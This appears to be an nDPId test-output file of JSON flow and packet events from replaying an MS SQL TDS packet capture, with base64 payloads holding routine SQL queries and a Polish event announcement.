+00863{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1240877917918,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":358,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":358,"pkt_l4_len":324,"thread_ts_msec":1240877917918,"pkt":"AAwpiUrKAFBWwAABCABFAAFYnINAAEAGGT4Kb29vCgAAAQRXBZk+5C+0WSFQtIAYAFxIvAAAAQEICgQLsOcAAVvMAwEBJAAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANDQAQABQADAAIABuAHYAYQByAGMAaABhAHIAKAA0ADAAMAAwACkALABAAFAAMQAgAGkAbgB0AAAA50AfCQTQADSQAHMAZQBsAGUAYwB0ACAAKgAgAGYAcgBvAG0AIAB0AGUAcwB0AF8AdABhAGIAbABlAF8AMQAgAHcAaABlAHIAZQAgAG4AYQBtAGUAIAA9ACAAQABQADAAIABhAG4AZAAgAGkAZAAgAD0AIABAAFAAMQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAAA50AfCQTQADQGAHoAegB6AAAAJgQEAgAAAA=="} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":4,"total-skipped-flows":0,"total-l4-data-len":874,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1259762400004} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAABUAAdAAEAGtr4Kb29vCgAAAQiuBZn\/ymPG\/zlOU1AYEAArKgAAAQEALAAAAQBDAE8ATQBNAEkAVAAgAFQAUgBBAE4AUwBBAEMAVABJAE8ATgA="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400004,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":1,"thread_ts_msec":1259762400004,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":2222,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1259762400004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1259762400004,"pkt":"ABj+dhvGERERERESCABFAAA5AAhAAEAGttgKAAABCm9vbwWZCK7\/OU5T\/8pj8lAYEABYKQAABAEAEQE6AQD9AADVAAAAAAA="} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1259762400022,"pkt":"ABj+dhvGERERERESCABFAADhAAlAAEAGti8Kb29vCgAAAQ0FBZmoWe0S76GBTlAYEAB74gAAAwkAuQAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAADgBwAF8ARwBlAHQAQgBvAGcAdQBzAEQAYQB0AGEAAAALQABTAGUAYQByAGMAaABUAHkAcABlAAAmAQEBFUAATQBhAHgAVwBhAGkAdABUAGkAbQBlAEkAbgBTAGUAYwBvAG4AZABzAAAmBAQAAAAAE0AAUAByAG8AYwBlAHMAcwBOAGUAZwBhAHQAaQB2AGUAQQBjAGsAACYBAQA="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400022,"flow_last_seen":1259762400022,"flow_idle_time":7440000,"flow_min_l4_payload_len":185,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":185,"midstream":1,"thread_ts_msec":1259762400022,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":3333,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01900{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1136,"pkt_l4_len":1102,"thread_ts_msec":1259762400033,"pkt":"ABj+dhvGERERERESCABFAARiAAxAAEAGsqsKb29vCgAAARFcBZmNJzZmudpdulAYEAAslQAAAwkEOgAAAQANAHMAcABfAGUAeABlAGMAdQB0AGUAcwBxAGwAAgAAAOemAwkE0AA0pgNTAEUATABFAEMAVAAgAFQATwBQACAAOAA4ACAAWwBkAGIAbwBdAC4AWwBNAHkARQB4AGEAbQBwAGwAZQBUAGEAYgBsAGUAXQAuAFsASQBEAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEUAbgB0AGkAdAB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBIAGkAcwB0AG8AcgB5AEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBUAHkAcABlAEkARABdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0ALAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACwAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBPAHAAZQByAGEAdABpAG8AbgBUAHkAcABlAEkARABdACAARgBSAE8ATQAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0AIAAgAFcASABFAFIARQAgACgAIAAoACAAKAAgAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEgAYQBuAGQAbABpAG4AZwBTAHQAYQB0AHUAcwBdACAAPQAgAEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAKQApACkAIABPAFIARABFAFIAIABCAFkAIABbAGQAYgBvAF0ALgBbAE0AeQBFAHgAYQBtAHAAbABlAFQAYQBiAGwAZQBdAC4AWwBFAG4AdABpAHQAeQBWAGUAcgBzAGkAbwBuAF0AIABBAFMAQwAsAFsAZABiAG8AXQAuAFsATQB5AEUAeABhAG0AcABsAGUAVABhAGIAbABlAF0ALgBbAEkARABdACAAQQBTAEMAAADnMAAJBNAANDAAQABIAGEAbgBkAGwAaQBuAGcAUwB0AGEAdAB1AHMAMQAgAHQAaQBuAHkAaQBuAHQAEEAASABhAG4AZABsAGkAbgBnAFMAdABhAHQAdQBzADEAACYBAQA="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400033,"flow_last_seen":1259762400033,"flow_idle_time":7440000,"flow_min_l4_payload_len":1082,"flow_max_l4_payload_len":1082,"flow_tot_l4_payload_len":1082,"flow_avg_l4_payload_len":1082,"midstream":1,"thread_ts_msec":1259762400033,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":4444,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1259762400716,"pkt":"AAwp2\/PSAB3lNE84CABFAADmQ4pAAH8GM6kKb29vCgAAARWzBZmoeiv6Zz8h41AY96R0ygAAAQEAvgAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAAIABzAGUAdAAgAHQAcgBhAG4AcwBhAGMAdABpAG8AbgAgAGkAcwBvAGwAYQB0AGkAbwBuACAAbABlAHYAZQBsACAAIAByAGUAYQBkACAAYwBvAG0AbQBpAHQAdABlAGQAIAAgAHMAZQB0ACAAaQBtAHAAbABpAGMAaQB0AF8AdAByAGEAbgBzAGEAYwB0AGkAbwBuAHMAIABvAGYAZgAgAA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762400716,"flow_last_seen":1259762400716,"flow_idle_time":7440000,"flow_min_l4_payload_len":190,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1259762400716,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":5555,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1259762400730,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":1259762400730,"pkt":"AAAMB6wCAAwp2\/PSCABFAABKJJBAAIAGUj8KAAABCm9vbwWZFbNnPyHjqHosuFAY+DP7pwAABAEAIgAzAQD9AQD5AAAAAAAAAAAA\/QAAugAAAAAAAAAAAA=="} -00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1259762400747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":307,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":307,"pkt_l4_len":273,"thread_ts_msec":1259762400747,"pkt":"AAwp2\/PSAB3lNE84CABFAAElQ4tAAH8GM2kKb29vCgAAARWzBZmoeiy4Zz8iBVAY94KXAwAAAwEA\/QAAAQAWAAAAEgAAAAIAAAAAAAAAAAABAAAA\/\/8NAAAAAAEmBAQAAAAAAADnQB8JBNAANP\/\/AADnQB8JBNAANLgAYwByAGUAYQB0AGUAIAB0AGEAYgBsAGUAIABuAGUAdwBzAHkAYgAgACgAYwBvAGwAdQBtAG4AMQAgAGMAaABhAHIAKAAzADAAKQAgAG4AbwB0ACAAbgB1AGwAbAAsACAAYwBvAGwAdQBtAG4AMgAgAGMAaABhAHIAKAAzADAAKQAgAG4AdQBsAGwALABjAG8AbAB1AG0AbgAzACAAYwBoAGEAcgAoADMAMAApACAAbgB1AGwAbAApAA=="} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1240877917888,"flow_last_seen":1240877918029,"flow_idle_time":7440000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":874,"flow_avg_l4_payload_len":218,"midstream":1,"thread_ts_msec":1259762407935,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":1111,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1259762474884,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1259762474884,"l3_proto":"ip4","src_ip":"10.111.111.111","dst_ip":"10.0.0.1","src_port":6666,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3m9AAIAGks0Kb29vCgAAARoKBZn0doxX83WfcFAQ\/vLIiAAAAwQfQAAAAQAWAAAAEgAAAAIAJgAAAJ0AAAABAAAADQBwAF8AUwBhAHYAZQBFAHgAYQBtAHAAbABlAAAACkAATABvAG4AZwBQAGEAcgBhAG0AAOf\/\/wkE0AA0BCAAAAAAAAAEIAAAUwB0AHUAZABlAG4AYwBrAGkAZQAgAEsAbwBCAW8AIABQAHIAegBlAHcAbwBkAG4AaQBrAPMAdwAgAFQAdQByAHkAcwB0AHkAYwB6AG4AeQBjAGgAIAB3ACAARwBkAGEARAFzAGsAdQAKAHoAYQBwAHIAYQBzAHoAYQAgAG4AYQA6AAoAWABYAFgAVgAgAE4AbwBjAG4AZQAgAE0AYQByAHMAegBlACAAbgBhACAATwByAGkAZQBuAHQAYQBjAGoAGQEgACIARABhAHIAfAFsAHUAYgAiAAoAMAA0AC8AMAA1ACAAZwByAHUAZABuAGkAYQAgADIAMAAxADAACgAKAFcAcwB0ABkBcAAKAAoATgBvAGMAbgBlACAATQBhAHIAcwB6AGUAIABuAGEAIABPAHIAaQBlAG4AdABhAGMAagAZASAAIgBEAGEAcgB8AWwAdQBiACIAIABzAAUBIAB0AHUAcgB5AHMAdAB5AGMAegBuAAUBIABpAG0AcAByAGUAegAFASAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgACgASQBuAE8AKQAsACAAdwAgAGsAdADzAHIAZQBqACAAdQBjAHoAZQBzAHQAbgBpAGMAeQAgAG0AYQBqAAUBIAB6AGEAIAB6AGEAZABhAG4AaQBlACAAcABvAHQAdwBpAGUAcgBkAHoAaQAHASAAdwAgAG8AawByAGUAWwFsAG8AbgB5AG0AIABsAGkAbQBpAGMAaQBlACAAYwB6AGEAcwB1ACAAcwB3AG8AagAFASAAbwBiAGUAYwBuAG8AWwEHASAAcAByAHoAeQAgAHUAcwB0AGEAdwBpAG8AbgB5AGMAaAAgAHcAIAB0AGUAcgBlAG4AaQBlACAAcAB1AG4AawB0AGEAYwBoACAAawBvAG4AdAByAG8AbABuAHkAYwBoAC4AIABOAGEAIABkAGEAbgBlAGoAIAB0AHIAYQBzAGkAZQAgAHoAdwB5AGMAaQAZAXwBYQAgAHoAZQBzAHAA8wBCASwAIABrAHQA8wByAHkAIAB6AGEAIABwAG8AawBvAG4AYQBuAGkAZQAgAHQAcgBhAHMAeQAgAHUAegB5AHMAawBhAEIBIABuAGEAagBtAG4AaQBlAGoAcwB6AAUBIABsAGkAYwB6AGIAGQEgAHAAdQBuAGsAdADzAHcAIABrAGEAcgBuAHkAYwBoAC4AIABVAGMAegBlAHMAdABuAGkAawDzAHcAIABvAGIAbwB3AGkABQF6AHUAagBlACAAegBtAG8AZAB5AGYAaQBrAG8AdwBhAG4AeQAgAHIAZQBnAHUAbABhAG0AaQBuACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AGMAaAAgAGkAbQBwAHIAZQB6ACAAbgBhACAAbwByAGkAZQBuAHQAYQBjAGoAGQEgAFAAVABUAEsALgAKAAoAVAB5AG0AIAByAGEAegBlAG0AIAB0AG8AdwBhAHIAegB5AHMAegB5AAcBIABuAGEAbQAgAGIAGQFkAHoAaQBlACAAYQBnAGUAbgB0ACAAMAAwADcALAAgAEoAYQBtAGUAcwAgAEIAbwBuAGQALgAgAFoAZABvAGIABQFkAHoBYwBpAGUAIABsAGkAYwBlAG4AYwBqABkBIABuAGEAIAB6AGEAYgBCAQUBZAB6AGUAbgBpAGUAIQAKAAoASgBhAGsAIABjAG8AIAByAG8AawB1ACAAbwBkAGIAGQFkAHoAaQBlACAAcwBpABkBIABrAG8AbgBrAHUAcgBzACAAbgBhACAAbgBhAGoAbAA="} -02410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nBAAIAGkswKb29vCgAAARoKBZn0dpIL83WfcFAQ\/vKFNgAAZQBwAHMAegAFASAAbgBhAHoAdwAZASAAegBlAHMAcABvAEIBdQAgAG4AYQB3AGkABQF6AHUAagAFAWMABQEgAGQAbwAgAHQAZQBtAGEAdAB1ACAAcAByAHoAZQB3AG8AZABuAGkAZQBnAG8AIABpAG0AcAByAGUAegB5AC4ACgAKADEALgAgAE8AcgBnAGEAbgBpAHoAYQB0AG8AcgAgAGkAbQBwAHIAZQB6AHkACgAKAFMAdAB1AGQAZQBuAGMAawBpAGUAIABLAG8AQgFvACAAUAByAHoAZQB3AG8AZABuAGkAawDzAHcAIABUAHUAcgB5AHMAdAB5AGMAegBuAHkAYwBoACAAdwAgAEcAZABhAEQBcwBrAHUALAAgAGQAegBpAGEAQgFhAGoABQFjAGUAIABwAHIAegB5ACAATwBkAGQAegBpAGEAbABlACAAUwB0AHUAZABlAG4AYwBrAGkAbQAgAFAAVABUAEsALgAKAEEAZAByAGUAcwA6ACAAdQBsAC4AIABTAGkAZQBkAGwAaQBjAGsAYQAgADQALAAgADgAMAAtADIAMgAyACAARwBkAGEARAFzAGsALAAgAGUALQBtAGEAaQBsADoAIABzAGsAcAB0AEAAcwBrAHAAdAAuAGcAZABhAG4AcwBrAC4AcABsACwAIAB3AHcAdwAuAHMAawBwAHQALgBnAGQAYQBuAHMAawAuAHAAbAAKAAoAMgAuACAAVwBzAHAA8wBCAXAAcgBhAGMAYQAgAGkAIABzAHAAbwBuAHMAbwByAHoAeQAKAAoAIAAgACAAIAAqACAAZgBpAHIAbQBhACAAYwBhAHQAZQByAGkAbgBnAG8AdwBhACAAWQBlAGwAbABvAHcAIABDAGEAdABlAHIAaQBuAGcACgAgACAAIAAgACoAIABTAHQAbwB3AGEAcgB6AHkAcwB6AGUAbgBpAGUAIABOAGEAIABSAHoAZQBjAHoAIABSAGEAdABvAHcAbgBpAGMAdAB3AGEAIABBAGQAaQB1AHQAYQByAGUACgAgACAAIAAgACoAIABwAHIAbwBkAHUAYwBlAG4AdAAgAFsBcABpAHcAbwByAPMAdwAgAGkAIABvAGQAegBpAGUAfAF5ACAAcAB1AGMAaABvAHcAZQBqACAAUgBvAGIAZQByAHQAJwBzACAATwB1AHQAZABvAG8AcgAgAEUAcQB1AGkAcABtAGUAbgB0AAoAIAAgACAAIAAqACAAcwBrAGwAZQBwACAAegAgAG8AZAB6AGkAZQB8AQUBIABpACAAcwBwAHIAegAZAXQAZQBtACAAdAB1AHIAeQBzAHQAeQBjAHoAbgB5AG0AIABUAHIAZQBrAAoAIAAgACAAIAAqACAAVwB5AGQAYQB3AG4AaQBjAHQAdwBvACAARQBrAG8ALQBLAGEAcABpAG8AIABQAGkAbwB0AHIAIABLAGEAcABjAHoAeQBEAXMAawBpAAoAIAAgACAAIAAqACAAUwBrAGwAZQBwACAAZwDzAHIAcwBrAGkAIABFAC0AcABhAG0AaQByAC4AcABsAAoAIAAgACAAIAAqACAAVABlAGEAdAByACAATQBpAGUAagBzAGsAaQAgAHcAIABHAGQAeQBuAGkAIABpAG0ALgAgAFcALgAgAEcAbwBtAGIAcgBvAHcAaQBjAHoAYQAKACAAIAAgACAAKgAgAFcAcwBwAGkAbgBhAGwAbgBpAGEAIABBAGwAZgBhACAAQwBlAG4AdAByAHUAbQAKACAAIAAgACAAKgAgAFAAaQBlAGsAYQByAG4AaQBhAC0AQwB1AGsAaQBlAHIAbgBpAGEAIABLAHIAYQBzAGsAbwB3AHMAawBpAAoACgAKADMALgAgAE4AbwB3AG8AWwFjAGkAIAB3ACAAdABlAGoAIABlAGQAeQBjAGoAaQAKAAoAIAA="} -02411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"mssql_tds.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1259762474884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1259762474884,"pkt":"ABI\/\/61OABI\/\/6f2CABFAAXc3nFAAIAGkssKb29vCgAAARoKBZn0dpe\/83WfcFAQ\/vIuZwAAIAAgACAAKgAgAEwAaQBjAHoAYgBhACAAdAByAGEAcwAgAFQAcgB1AGQAbgB5AGMAaAAgAHoAbwBzAHQAYQBCAWEAIABvAGcAcgBhAG4AaQBjAHoAbwBuAGEAIABkAG8AIABkAHcA8wBjAGgALAAgAGEAIABuAGEAIAB0AHIAYQBzAGkAZQAgAE0AYQBCAW8AIABUAHIAdQBkAG4AZQBqACAAegB3AGkAGQFrAHMAegB5AGwAaQBbAW0AeQAgAGwAaQBtAGkAdAAgAG8AcwDzAGIAIAB3ACAAegBlAHMAcABvAEIBYQBjAGgAIABkAG8AIABwAGkAGQFjAGkAdQAuACAASgBlAGQAbgBvAGMAegBlAFsBbgBpAGUAIABpAG4AZgBvAHIAbQB1AGoAZQBtAHkALAAgAHwBZQAgAHoAdwB5AGMAaQAZAXMAawBpAGUAIABkAHIAdQB8AXkAbgB5ACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAG8AdAByAHoAeQBtAGEAagAFASAAbgBhAGcAcgBvAGQAeQAgAGoAYQBrAG8AIABvAHMAdABhAHQAbgBpAGUALAAgAHAAbwAgAHoAdwB5AGMAaQAZAXoAYwBhAGMAaAAgAHcAcwB6AHkAcwB0AGsAaQBjAGgAIABwAG8AegBvAHMAdABhAEIBeQBjAGgAIAB0AHIAYQBzAC4AIABaAGEAYwBoABkBYwBhAG0AeQAgAGQAbwAgAHUAYwB6AGUAcwB0AG4AaQBjAHQAdwBhACAAbgBhACAAdABlAGoAIAB0AHIAYQBzAGkAZQAgAHIAbwBkAHoAaQBuAHkAIAB6ACAAZAB6AGkAZQAHAW0AaQAuAAoAIAAgACAAIAAqACAAUABvAGQAbgBpAGUAcwBpAG8AbgBhACAAegBvAHMAdABhAEIBYQAgAHcAeQBzAG8AawBvAFsBBwEgAHcAcABpAHMAbwB3AGUAZwBvACAAZABsAGEAIAB6AGUAcwBwAG8AQgHzAHcAIAB6AGEAcABpAHMAdQBqAAUBYwB5AGMAaAAgAHMAaQAZASAAcAByAHoAZQB6ACAASQBuAHQAZQByAG4AZQB0ACAAaQAgAHcAeQBuAG8AcwBpACAAbwBiAGUAYwBuAGkAZQAgADIANQAgAFAATABOAC4ACgAgACAAIAAgACoAIABQAG8AZABuAGkAZQBzAGkAbwBuAGEAIAB6AG8AcwB0AGEAQgFhACAAdABhAGsAfAFlACAAdwB5AHMAbwBrAG8AWwEHASAAdwBwAGkAcwBvAHcAZQBnAG8AIABkAGwAYQAgAHoAZQBzAHAAbwBCAfMAdwAgAHUAaQBzAHoAYwB6AGEAagAFAWMAeQBjAGgAIABvAHAAQgFhAHQAGQEgAHcAIABiAGEAegBpAGUAIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABsAHUAYgAgAHoAYQBwAGkAcwB1AGoABQFjAHkAYwBoACAAcwBpABkBIAB3ACAAZABuAGkAdQAgAGkAbQBwAHIAZQB6AHkAIABpACAAdwB5AG4AbwBzAGkAIABvAGIAZQBjAG4AaQBlACAANAAwACAAUABMAE4ALgAKACAAIAAgACAAKgAgAE0AaQBlAGoAcwBjAGUAIABzAHQAYQByAHQAdQAgAG8AZwBCAW8AcwB6AG8AbgBlACAAegBvAHMAdABhAG4AaQBlACAAdwAgAGQAbgBpAHUAIABpAG0AcAByAGUAegB5ACAAbwAgAGcAbwBkAHoAaQBuAGkAZQAgADAAOQA6ADAAMAAuAAoAIAAgACAAIAAqACAASQBzAHQAbgBpAGUAagBlACAAbQBvAHwBbABpAHcAbwBbAQcBIABzAGsAbwByAHoAeQBzAHQAYQBuAGkAYQAgAHoAIAB0AHIAYQBuAHMAcAA="} 